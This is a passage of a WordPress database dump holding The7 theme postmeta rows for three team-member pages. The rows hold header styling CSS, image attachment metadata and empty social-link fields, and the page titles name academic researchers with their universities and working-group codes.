(18847,3035,'_dt_teammate_options_vimeo',''),
(18848,3035,'_dt_teammate_options_tumbler',''),
(18849,3035,'_dt_teammate_options_pinterest',''),
(18850,3035,'_dt_teammate_options_devian',''),
(18851,3035,'_dt_teammate_options_skype',''),
(18852,3035,'_dt_teammate_options_github',''),
(18853,3035,'_dt_teammate_options_instagram',''),
(18854,3035,'_dt_teammate_options_stumbleupon',''),
(18855,3035,'_dt_teammate_options_behance',''),
(18856,3035,'_dt_teammate_options_px-500',''),
(18857,3035,'_dt_teammate_options_tripedvisor',''),
(18858,3035,'_dt_teammate_options_vk',''),
(18859,3035,'_dt_teammate_options_foursquare',''),
(18860,3035,'_dt_teammate_options_xing',''),
(18861,3035,'_dt_teammate_options_weibo',''),
(18862,3035,'_dt_teammate_options_odnoklassniki',''),
(18863,3035,'_dt_teammate_options_research-gate',''),
(18864,3035,'_dt_teammate_options_yelp',''),
(18865,3035,'_dt_teammate_options_blogger',''),
(18866,3035,'_dt_teammate_options_soundcloud',''),
(18867,3035,'_dt_teammate_options_viber',''),
(18868,3035,'_dt_teammate_options_whatsapp',''),
(18869,3035,'_dt_teammate_options_reddit',''),
(18870,3035,'_dt_teammate_options_snapchat',''),
(18871,3035,'_dt_teammate_options_telegram',''),
(18872,3035,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18873,3037,'_edit_lock','1667935470:1'),
(18874,3038,'_wp_attached_file','2022/11/wss204.jpg'),
(18875,3038,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:141;s:6:\"height\";i:177;s:4:\"file\";s:18:\"2022/11/wss204.jpg\";s:8:\"filesize\";i:32142;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss204-141x150.jpg\";s:5:\"width\";i:141;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4624;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18876,3037,'_thumbnail_id','3038'),
(18877,3037,'_edit_last','1'),
(18878,3037,'_dt_sidebar_position','disabled'),
(18879,3037,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18880,3037,'_dt_sidebar_hide_on_mobile','0'),
(18881,3037,'_dt_footer_show','1'),
(18882,3037,'_dt_footer_widgetarea_id','sidebar_2'),
(18883,3037,'_dt_footer_hide_on_mobile','0'),
(18884,3037,'_dt_header_title','fancy'),
(18885,3037,'_dt_header_background','normal'),
(18886,3037,'_dt_header_background_below_slideshow','disabled'),
(18887,3037,'_dt_header_transparent_bg_color_scheme','light'),
(18888,3037,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(18889,3037,'_dt_header_transparent_top_bar_bg_opacity','25'),
(18890,3037,'_dt_header_transparent_bg_color','#000000'),
(18891,3037,'_dt_header_transparent_bg_opacity','50'),
(18892,3037,'_dt_header_disabled_background','normal'),
(18893,3037,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(18894,3037,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(18895,3037,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(18896,3037,'_dt_header_disabled_transparent_bg_color','#000000'),
(18897,3037,'_dt_header_disabled_transparent_bg_opacity','50'),
(18898,3037,'_dt_page_overrides_top_margin',''),
(18899,3037,'_dt_page_overrides_right_margin',''),
(18900,3037,'_dt_page_overrides_bottom_margin',''),
(18901,3037,'_dt_page_overrides_left_margin',''),
(18902,3037,'_dt_mobile_page_padding_top',''),
(18903,3037,'_dt_mobile_page_padding_right',''),
(18904,3037,'_dt_mobile_page_padding_bottom',''),
(18905,3037,'_dt_mobile_page_padding_left',''),
(18906,3037,'_dt_fancy_header_layout_heading',''),
(18907,3037,'_dt_fancy_header_title_aligment','center'),
(18908,3037,'_dt_fancy_header_height','300'),
(18909,3037,'_dt_fancy_header_padding-top','0px'),
(18910,3037,'_dt_fancy_header_padding-bottom','0px'),
(18911,3037,'_dt_fancy_header_breadcrumbs_heading',''),
(18912,3037,'_dt_fancy_header_breadcrumbs','disabled'),
(18913,3037,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(18914,3037,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(18915,3037,'_dt_fancy_header_title_heading',''),
(18916,3037,'_dt_fancy_header_title_mode','custom'),
(18917,3037,'_dt_fancy_header_title','Fabian Faßnacht Freie Universität, Germany (WGI-7)'),
(18918,3037,'_dt_fancy_header_title_font_size','30'),
(18919,3037,'_dt_fancy_header_title_line_height','36'),
(18920,3037,'_dt_fancy_header_text_transform','none'),
(18921,3037,'_dt_fancy_header_title_color_mode','color'),
(18922,3037,'_dt_fancy_header_title_color','#ffffff'),
(18923,3037,'_dt_fancy_header_subtitle_heading',''),
(18924,3037,'_dt_fancy_header_subtitle',''),
(18925,3037,'_dt_fancy_header_subtitle_font_size','18'),
(18926,3037,'_dt_fancy_header_subtitle_line_height','26'),
(18927,3037,'_dt_fancy_header_subtitle_text_transform','none'),
(18928,3037,'_dt_fancy_header_subtitle_color_mode','color'),
(18929,3037,'_dt_fancy_header_subtitle_color','#ffffff'),
(18930,3037,'_dt_fancy_header_bg_heading',''),
(18931,3037,'_dt_fancy_header_bg_color','#222222'),
(18932,3037,'_dt_fancy_header_bg_image_origin','custom'),
(18933,3037,'_dt_fancy_header_bg_image','a:0:{}'),
(18934,3037,'_dt_fancy_header_bg_repeat','no-repeat'),
(18935,3037,'_dt_fancy_header_bg_position_x','center'),
(18936,3037,'_dt_fancy_header_bg_position_y','center'),
(18937,3037,'_dt_fancy_header_bg_fullscreen','1'),
(18938,3037,'_dt_fancy_header_bg_overlay','0'),
(18939,3037,'_dt_fancy_header_overlay_color','#000'),
(18940,3037,'_dt_fancy_header_bg_overlay_opacity','50'),
(18941,3037,'_dt_fancy_header_scroll_effect','default'),
(18942,3037,'_dt_fancy_header_bg_parallax','0.5'),
(18943,3037,'_dt_fancy_header_responsiveness_heading',''),
(18944,3037,'_dt_fancy_header_responsiveness','enabled'),
(18945,3037,'_dt_fancy_header_responsiveness_switch','778px'),
(18946,3037,'_dt_fancy_header_responsive_height','70'),
(18947,3037,'_dt_fancy_header_responsive_font_size','30'),
(18948,3037,'_dt_fancy_header_responsive_title_line_height','38'),
(18949,3037,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(18950,3037,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(18951,3037,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(18952,3037,'_dt_teammate_options_go_to_single','1'),
(18953,3037,'_dt_teammate_options_position',''),
(18954,3037,'_dt_teammate_options_website',''),
(18955,3037,'_dt_teammate_options_mail',''),
(18956,3037,'_dt_teammate_options_facebook',''),
(18957,3037,'_dt_teammate_options_twitter',''),
(18958,3037,'_dt_teammate_options_dribbble',''),
(18959,3037,'_dt_teammate_options_you-tube',''),
(18960,3037,'_dt_teammate_options_rss',''),
(18961,3037,'_dt_teammate_options_delicious',''),
(18962,3037,'_dt_teammate_options_flickr',''),
(18963,3037,'_dt_teammate_options_lastfm',''),
(18964,3037,'_dt_teammate_options_linkedin',''),
(18965,3037,'_dt_teammate_options_vimeo',''),
(18966,3037,'_dt_teammate_options_tumbler',''),
(18967,3037,'_dt_teammate_options_pinterest',''),
(18968,3037,'_dt_teammate_options_devian',''),
(18969,3037,'_dt_teammate_options_skype',''),
(18970,3037,'_dt_teammate_options_github',''),
(18971,3037,'_dt_teammate_options_instagram',''),
(18972,3037,'_dt_teammate_options_stumbleupon',''),
(18973,3037,'_dt_teammate_options_behance',''),
(18974,3037,'_dt_teammate_options_px-500',''),
(18975,3037,'_dt_teammate_options_tripedvisor',''),
(18976,3037,'_dt_teammate_options_vk',''),
(18977,3037,'_dt_teammate_options_foursquare',''),
(18978,3037,'_dt_teammate_options_xing',''),
(18979,3037,'_dt_teammate_options_weibo',''),
(18980,3037,'_dt_teammate_options_odnoklassniki',''),
(18981,3037,'_dt_teammate_options_research-gate',''),
(18982,3037,'_dt_teammate_options_yelp',''),
(18983,3037,'_dt_teammate_options_blogger',''),
(18984,3037,'_dt_teammate_options_soundcloud',''),
(18985,3037,'_dt_teammate_options_viber',''),
(18986,3037,'_dt_teammate_options_whatsapp',''),
(18987,3037,'_dt_teammate_options_reddit',''),
(18988,3037,'_dt_teammate_options_snapchat',''),
(18989,3037,'_dt_teammate_options_telegram',''),
(18990,3037,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(18991,3039,'_edit_lock','1667935525:1'),
(18992,3040,'_wp_attached_file','2022/11/wss205.jpg'),
(18993,3040,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:142;s:6:\"height\";i:181;s:4:\"file\";s:18:\"2022/11/wss205.jpg\";s:8:\"filesize\";i:29233;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss205-142x150.jpg\";s:5:\"width\";i:142;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:4275;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(18994,3039,'_thumbnail_id','3040'),
(18995,3039,'_edit_last','1'),
(18996,3039,'_dt_sidebar_position','right'),
(18997,3039,'_dt_sidebar_widgetarea_id','sidebar_1'),
(18998,3039,'_dt_sidebar_hide_on_mobile','0'),
(18999,3039,'_dt_footer_show','1'),
(19000,3039,'_dt_footer_widgetarea_id','sidebar_2'),
(19001,3039,'_dt_footer_hide_on_mobile','0'),
(19002,3039,'_dt_header_title','fancy'),
(19003,3039,'_dt_header_background','normal'),
(19004,3039,'_dt_header_background_below_slideshow','disabled'),
(19005,3039,'_dt_header_transparent_bg_color_scheme','light'),
(19006,3039,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(19007,3039,'_dt_header_transparent_top_bar_bg_opacity','25'),
(19008,3039,'_dt_header_transparent_bg_color','#000000'),
(19009,3039,'_dt_header_transparent_bg_opacity','50'),
(19010,3039,'_dt_header_disabled_background','normal'),
(19011,3039,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19012,3039,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(19013,3039,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(19014,3039,'_dt_header_disabled_transparent_bg_color','#000000'),
(19015,3039,'_dt_header_disabled_transparent_bg_opacity','50'),
(19016,3039,'_dt_page_overrides_top_margin',''),
(19017,3039,'_dt_page_overrides_right_margin',''),
(19018,3039,'_dt_page_overrides_bottom_margin',''),
(19019,3039,'_dt_page_overrides_left_margin',''),
(19020,3039,'_dt_mobile_page_padding_top',''),
(19021,3039,'_dt_mobile_page_padding_right',''),
(19022,3039,'_dt_mobile_page_padding_bottom',''),
(19023,3039,'_dt_mobile_page_padding_left',''),
(19024,3039,'_dt_fancy_header_layout_heading',''),
(19025,3039,'_dt_fancy_header_title_aligment','center'),
(19026,3039,'_dt_fancy_header_height','300'),
(19027,3039,'_dt_fancy_header_padding-top','0px'),
(19028,3039,'_dt_fancy_header_padding-bottom','0px'),
(19029,3039,'_dt_fancy_header_breadcrumbs_heading',''),
(19030,3039,'_dt_fancy_header_breadcrumbs','disabled'),
(19031,3039,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(19032,3039,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(19033,3039,'_dt_fancy_header_title_heading',''),
(19034,3039,'_dt_fancy_header_title_mode','custom'),
(19035,3039,'_dt_fancy_header_title','Weishu Gong University of Maryland, College Park, USA (WGIII-1)'),
(19036,3039,'_dt_fancy_header_title_font_size','30'),
(19037,3039,'_dt_fancy_header_title_line_height','36'),
(19038,3039,'_dt_fancy_header_text_transform','none'),
(19039,3039,'_dt_fancy_header_title_color_mode','color'),
(19040,3039,'_dt_fancy_header_title_color','#ffffff'),
(19041,3039,'_dt_fancy_header_subtitle_heading',''),
(19042,3039,'_dt_fancy_header_subtitle',''),
(19043,3039,'_dt_fancy_header_subtitle_font_size','18'),
(19044,3039,'_dt_fancy_header_subtitle_line_height','26'),
(19045,3039,'_dt_fancy_header_subtitle_text_transform','none'),
(19046,3039,'_dt_fancy_header_subtitle_color_mode','color'),
(19047,3039,'_dt_fancy_header_subtitle_color','#ffffff'),
(19048,3039,'_dt_fancy_header_bg_heading',''),
(19049,3039,'_dt_fancy_header_bg_color','#222222'),
(19050,3039,'_dt_fancy_header_bg_image_origin','custom'),
(19051,3039,'_dt_fancy_header_bg_image','a:0:{}'),
(19052,3039,'_dt_fancy_header_bg_repeat','no-repeat'),
(19053,3039,'_dt_fancy_header_bg_position_x','center'),
(19054,3039,'_dt_fancy_header_bg_position_y','center'),
(19055,3039,'_dt_fancy_header_bg_fullscreen','1'),
(19056,3039,'_dt_fancy_header_bg_overlay','0'),
(19057,3039,'_dt_fancy_header_overlay_color','#000'),
(19058,3039,'_dt_fancy_header_bg_overlay_opacity','50'),
(19059,3039,'_dt_fancy_header_scroll_effect','default'),
(19060,3039,'_dt_fancy_header_bg_parallax','0.5'),
(19061,3039,'_dt_fancy_header_responsiveness_heading',''),
(19062,3039,'_dt_fancy_header_responsiveness','enabled'),
(19063,3039,'_dt_fancy_header_responsiveness_switch','778px'),
(19064,3039,'_dt_fancy_header_responsive_height','70'),
(19065,3039,'_dt_fancy_header_responsive_font_size','30'),
(19066,3039,'_dt_fancy_header_responsive_title_line_height','38'),
(19067,3039,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(19068,3039,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(19069,3039,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(19070,3039,'_dt_teammate_options_go_to_single','1'),
(19071,3039,'_dt_teammate_options_position',''),
(19072,3039,'_dt_teammate_options_website',''),
(19073,3039,'_dt_teammate_options_mail',''),
(19074,3039,'_dt_teammate_options_facebook',''),
(19075,3039,'_dt_teammate_options_twitter',''),
(19076,3039,'_dt_teammate_options_dribbble',''),
(19077,3039,'_dt_teammate_options_you-tube',''),
(19078,3039,'_dt_teammate_options_rss',''),
(19079,3039,'_dt_teammate_options_delicious',''),
(19080,3039,'_dt_teammate_options_flickr',''),
(19081,3039,'_dt_teammate_options_lastfm',''),
(19082,3039,'_dt_teammate_options_linkedin',''),
(19083,3039,'_dt_teammate_options_vimeo',''),
(19084,3039,'_dt_teammate_options_tumbler',''),
(19085,3039,'_dt_teammate_options_pinterest',''),
(19086,3039,'_dt_teammate_options_devian',''),
(19087,3039,'_dt_teammate_options_skype',''),
(19088,3039,'_dt_teammate_options_github',''),
(19089,3039,'_dt_teammate_options_instagram',''),
(19090,3039,'_dt_teammate_options_stumbleupon',''),
(19091,3039,'_dt_teammate_options_behance',''),
(19092,3039,'_dt_teammate_options_px-500',''),
(19093,3039,'_dt_teammate_options_tripedvisor',''),
(19094,3039,'_dt_teammate_options_vk',''),
(19095,3039,'_dt_teammate_options_foursquare',''),
(19096,3039,'_dt_teammate_options_xing',''),
(19097,3039,'_dt_teammate_options_weibo',''),
(19098,3039,'_dt_teammate_options_odnoklassniki',''),
(19099,3039,'_dt_teammate_options_research-gate',''),
(19100,3039,'_dt_teammate_options_yelp',''),
(19101,3039,'_dt_teammate_options_blogger',''),
(19102,3039,'_dt_teammate_options_soundcloud',''),
(19103,3039,'_dt_teammate_options_viber',''),
(19104,3039,'_dt_teammate_options_whatsapp',''),
(19105,3039,'_dt_teammate_options_reddit',''),
(19106,3039,'_dt_teammate_options_snapchat',''),
(19107,3039,'_dt_teammate_options_telegram',''),
(19108,3039,'the7_fancy_title_css','.fancy-header {\n  background-image: none;\n  background-repeat: no-repeat;\n  background-position: center center;\n  background-size: cover;\n  background-color: #222222;\n}\n.mobile-false .fancy-header {\n  background-attachment: scroll;\n}\n.fancy-header .wf-wrap {\n  min-height: 300px;\n  padding-top: 0px;\n  padding-bottom: 0px;\n}\n.fancy-header .fancy-title {\n  font-size: 30px;\n  line-height: 36px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .fancy-subtitle {\n  font-size: 18px;\n  line-height: 26px;\n  color: #ffffff;\n  text-transform: none;\n}\n.fancy-header .breadcrumbs {\n  color: #ffffff;\n}\n.fancy-header-overlay {\n  background: rgba(0,0,0,0.5);\n}\n@media screen and (max-width: 778px) {\n  .fancy-header .wf-wrap {\n    min-height: 70px;\n  }\n  .fancy-header .fancy-title {\n    font-size: 30px;\n    line-height: 38px;\n  }\n  .fancy-header .fancy-subtitle {\n    font-size: 20px;\n    line-height: 28px;\n  }\n  .fancy-header.breadcrumbs-mobile-off .breadcrumbs {\n    display: none;\n  }\n  #fancy-header > .wf-wrap {\n    flex-flow: column wrap;\n    align-items: center;\n    justify-content: center;\n    padding-bottom: 0px !important;\n  }\n  .fancy-header.title-left .breadcrumbs {\n    text-align: center;\n    float: none;\n  }\n  .breadcrumbs {\n    margin-bottom: 10px;\n  }\n  .breadcrumbs.breadcrumbs-bg {\n    margin-top: 10px;\n  }\n  .fancy-header.title-right .breadcrumbs {\n    margin: 10px 0 10px 0;\n  }\n  #fancy-header .hgroup,\n  #fancy-header .breadcrumbs {\n    text-align: center;\n  }\n  .fancy-header .hgroup {\n    padding-bottom: 5px;\n  }\n  .breadcrumbs-off .hgroup {\n    padding-bottom: 5px;\n  }\n  .title-right .hgroup {\n    padding: 0 0 5px 0;\n  }\n  .title-right.breadcrumbs-off .hgroup {\n    padding-top: 5px;\n  }\n  .title-left.disabled-bg .breadcrumbs {\n    margin-bottom: 0;\n  }\n}\n'),
(19109,3041,'_edit_lock','1667935591:1'),
(19110,3042,'_wp_attached_file','2022/11/wss206.jpg'),
(19111,3042,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:145;s:6:\"height\";i:185;s:4:\"file\";s:18:\"2022/11/wss206.jpg\";s:8:\"filesize\";i:45278;s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:5:{s:4:\"file\";s:18:\"wss206-145x150.jpg\";s:5:\"width\";i:145;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";s:8:\"filesize\";i:6799;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"1\";s:8:\"keywords\";a:0:{}}}'),
(19112,3041,'_thumbnail_id','3042'),
(19113,3041,'_edit_last','1'),
(19114,3041,'_dt_sidebar_position','disabled'),
(19115,3041,'_dt_sidebar_widgetarea_id','sidebar_1'),
(19116,3041,'_dt_sidebar_hide_on_mobile','0'),
(19117,3041,'_dt_footer_show','1'),
(19118,3041,'_dt_footer_widgetarea_id','sidebar_2'),
(19119,3041,'_dt_footer_hide_on_mobile','0'),
(19120,3041,'_dt_header_title','fancy'),
(19121,3041,'_dt_header_background','normal'),
(19122,3041,'_dt_header_background_below_slideshow','disabled'),
(19123,3041,'_dt_header_transparent_bg_color_scheme','light'),
(19124,3041,'_dt_header_transparent_top_bar_bg_color','#ffffff'),
(19125,3041,'_dt_header_transparent_top_bar_bg_opacity','25'),
(19126,3041,'_dt_header_transparent_bg_color','#000000'),
(19127,3041,'_dt_header_transparent_bg_opacity','50'),
(19128,3041,'_dt_header_disabled_background','normal'),
(19129,3041,'_dt_header_disabled_transparent_bg_color_scheme','light'),
(19130,3041,'_dt_header_disabled_transparent_top_bar_bg_color','#ffffff'),
(19131,3041,'_dt_header_disabled_transparent_top_bar_bg_opacity','25'),
(19132,3041,'_dt_header_disabled_transparent_bg_color','#000000'),
(19133,3041,'_dt_header_disabled_transparent_bg_opacity','50'),
(19134,3041,'_dt_page_overrides_top_margin',''),
(19135,3041,'_dt_page_overrides_right_margin',''),
(19136,3041,'_dt_page_overrides_bottom_margin',''),
(19137,3041,'_dt_page_overrides_left_margin',''),
(19138,3041,'_dt_mobile_page_padding_top',''),
(19139,3041,'_dt_mobile_page_padding_right',''),
(19140,3041,'_dt_mobile_page_padding_bottom',''),
(19141,3041,'_dt_mobile_page_padding_left',''),
(19142,3041,'_dt_fancy_header_layout_heading',''),
(19143,3041,'_dt_fancy_header_title_aligment','center'),
(19144,3041,'_dt_fancy_header_height','300'),
(19145,3041,'_dt_fancy_header_padding-top','0px'),
(19146,3041,'_dt_fancy_header_padding-bottom','0px'),
(19147,3041,'_dt_fancy_header_breadcrumbs_heading',''),
(19148,3041,'_dt_fancy_header_breadcrumbs','disabled'),
(19149,3041,'_dt_fancy_header_breadcrumbs_text_color','#ffffff'),
(19150,3041,'_dt_fancy_header_breadcrumbs_bg_color','disabled'),
(19151,3041,'_dt_fancy_header_title_heading',''),
(19152,3041,'_dt_fancy_header_title_mode','custom'),
(19153,3041,'_dt_fancy_header_title','Jaime Hernandez University of Chile, Chile (WGIII-8)'),
(19154,3041,'_dt_fancy_header_title_font_size','30'),
(19155,3041,'_dt_fancy_header_title_line_height','36'),
(19156,3041,'_dt_fancy_header_text_transform','none'),
(19157,3041,'_dt_fancy_header_title_color_mode','color'),
(19158,3041,'_dt_fancy_header_title_color','#ffffff'),
(19159,3041,'_dt_fancy_header_subtitle_heading',''),
(19160,3041,'_dt_fancy_header_subtitle',''),
(19161,3041,'_dt_fancy_header_subtitle_font_size','18'),
(19162,3041,'_dt_fancy_header_subtitle_line_height','26'),
(19163,3041,'_dt_fancy_header_subtitle_text_transform','none'),
(19164,3041,'_dt_fancy_header_subtitle_color_mode','color'),
(19165,3041,'_dt_fancy_header_subtitle_color','#ffffff'),
(19166,3041,'_dt_fancy_header_bg_heading',''),
(19167,3041,'_dt_fancy_header_bg_color','#222222'),
(19168,3041,'_dt_fancy_header_bg_image_origin','custom'),
(19169,3041,'_dt_fancy_header_bg_image','a:0:{}'),
(19170,3041,'_dt_fancy_header_bg_repeat','no-repeat'),
(19171,3041,'_dt_fancy_header_bg_position_x','center'),
(19172,3041,'_dt_fancy_header_bg_position_y','center'),
(19173,3041,'_dt_fancy_header_bg_fullscreen','1'),
(19174,3041,'_dt_fancy_header_bg_overlay','0'),
(19175,3041,'_dt_fancy_header_overlay_color','#000'),
(19176,3041,'_dt_fancy_header_bg_overlay_opacity','50'),
(19177,3041,'_dt_fancy_header_scroll_effect','default'),
(19178,3041,'_dt_fancy_header_bg_parallax','0.5'),
(19179,3041,'_dt_fancy_header_responsiveness_heading',''),
(19180,3041,'_dt_fancy_header_responsiveness','enabled'),
(19181,3041,'_dt_fancy_header_responsiveness_switch','778px'),
(19182,3041,'_dt_fancy_header_responsive_height','70'),
(19183,3041,'_dt_fancy_header_responsive_font_size','30'),
(19184,3041,'_dt_fancy_header_responsive_title_line_height','38'),
(19185,3041,'_dt_fancy_header_responsive_subtitle_font_size','20'),
(19186,3041,'_dt_fancy_header_responsive_subtitle_line_height','28'),
(19187,3041,'_dt_fancy_header_responsive_breadcrumbs','disabled'),
(19188,3041,'_dt_teammate_options_go_to_single','1'),
(19189,3041,'_dt_teammate_options_position',''),
(19190,3041,'_dt_teammate_options_website',''),
(19191,3041,'_dt_teammate_options_mail',''),
(19192,3041,'_dt_teammate_options_facebook',''),
(19193,3041,'_dt_teammate_options_twitter',''),
(19194,3041,'_dt_teammate_options_dribbble',''),
(19195,3041,'_dt_teammate_options_you-tube',''),
(19196,3041,'_dt_teammate_options_rss',''),
(19197,3041,'_dt_teammate_options_delicious',''),
(19198,3041,'_dt_teammate_options_flickr',''),
(19199,3041,'_dt_teammate_options_lastfm',''),
(19200,3041,'_dt_teammate_options_linkedin',''),
(19201,3041,'_dt_teammate_options_vimeo',''),
(19202,3041,'_dt_teammate_options_tumbler',''),
(19203,3041,'_dt_teammate_options_pinterest',''),
(19204,3041,'_dt_teammate_options_devian',''),
(19205,3041,'_dt_teammate_options_skype',''),
(19206,3041,'_dt_teammate_options_github',''),
(19207,3041,'_dt_teammate_options_instagram',''),
(19208,3041,'_dt_teammate_options_stumbleupon',''),
(19209,3041,'_dt_teammate_options_behance',''),
(19210,3041,'_dt_teammate_options_px-500',''),
(19211,3041,'_dt_teammate_options_tripedvisor',''),
(19212,3041,'_dt_teammate_options_vk',''),
(19213,3041,'_dt_teammate_options_foursquare',''),
(19214,3041,'_dt_teammate_options_xing',''),
(19215,3041,'_dt_teammate_options_weibo',''),
(19216,3041,'_dt_teammate_options_odnoklassniki',''),
(19217,3041,'_dt_teammate_options_research-gate',''),
(19218,3041,'_dt_teammate_options_yelp',''),
(19219,3041,'_dt_teammate_options_blogger',''),
(19220,3041,'_dt_teammate_options_soundcloud',''),
(19221,3041,'_dt_teammate_options_viber',''),
(19222,3041,'_dt_teammate_options_whatsapp',''),
(19223,3041,'_dt_teammate_options_reddit',''),
(19224,3041,'_dt_teammate_options_snapchat',''),
(19225,3041,'_dt_teammate_options_telegram',''),
